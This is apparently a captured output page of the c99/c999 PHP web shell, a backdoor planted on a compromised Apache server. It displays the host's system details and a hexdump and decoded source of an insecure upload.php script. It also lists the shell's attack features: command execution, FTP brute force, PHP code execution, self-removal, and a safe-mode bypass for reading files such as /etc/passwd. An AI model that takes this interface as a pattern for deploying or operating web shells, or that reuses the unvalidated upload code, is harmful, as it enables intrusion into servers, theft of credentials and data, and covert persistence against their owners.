!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/   drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     upload.php (304 B)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/manage/upload.php
Size 304 B
MD5 a7ba6a281f42897f96d8a598c6f1eadd
Owner/Group apache/apache
Perms-rw-r--r--
Create time 03/07/2013 18:31:17
Access time 06/07/2024 17:48:16
MODIFY time 20/04/2004 20:29:36

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
3C 3F 70 68 70 0A 24 75 70 66 69 6C 65 20 3D 20 22 2F 75 70 6C 6F 61 64
73 2F 22 2E 24 75 73 65 72 66 69 6C 65 5F 6E 61 6D 65 3B 0A 69 66 20 28
69 73 5F 75 70 6C 6F 61 64 65 64 5F 66 69 6C 65 28 24 48 54 54 50 5F 50
4F 53 54 5F 46 49 4C 45 53 5B 27 75 73 65 72 66 69 6C 65 27 5D 5B 27 74
6D 70 5F 6E 61 6D 65 27 5D 29 29 0A 20 20 20 63 6F 70 79 28 24 75 73 65
72 66 69 6C 65 2C 24 75 70 66 69 6C 65 29 3B 0A 20 20 20 65 63 68 6F 22
75 70 6C 6F 61 64 20 66 69 6C 65 20 63 6F 6D 70 6C 65 74 65 20 22 3B 0A
20 20 20 24 66 70 20 3D 20 66 6F 70 65 6E 28 24 75 70 66 69 6C 65 2C 22
72 22 29 3B 0A 20 20 20 24 63 6F 6E 74 65 6E 74 73 20 3D 20 66 72 65 61
64 28 24 66 70 2C 66 69 6C 65 73 69 7A 65 28 24 75 70 66 69 6C 65 29 29
3B 0A 20 20 20 66 63 6C 6F 73 65 28 24 66 70 29 3B 0A 20 20 20 65 63 68
6F 22 64 69 73 70 6C 61 79 3C 62 72 3E 22 3B 0A 20 20 20 65 63 68 6F 20
24 63 6F 6E 74 65 6E 74 73 3B 0A 0A 0A 3F 3E 0A
<?php $upfile = "/upload
s/".$userfile_name; if (
is_uploaded_file($HTTP_P
OST_FILES['userfile']['t
mp_name']))    copy($use
rfile,$upfile);    echo"
upload file complete "; 
   $fp = fopen($upfile,"
r");    $contents = frea
d($fp,filesize($upfile))
;    fclose($fp);    ech
o"display<br>";    echo 
$contents;   ?> 

HEXDUMP: [Full] [Preview]
Base64:
[Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0079 ]--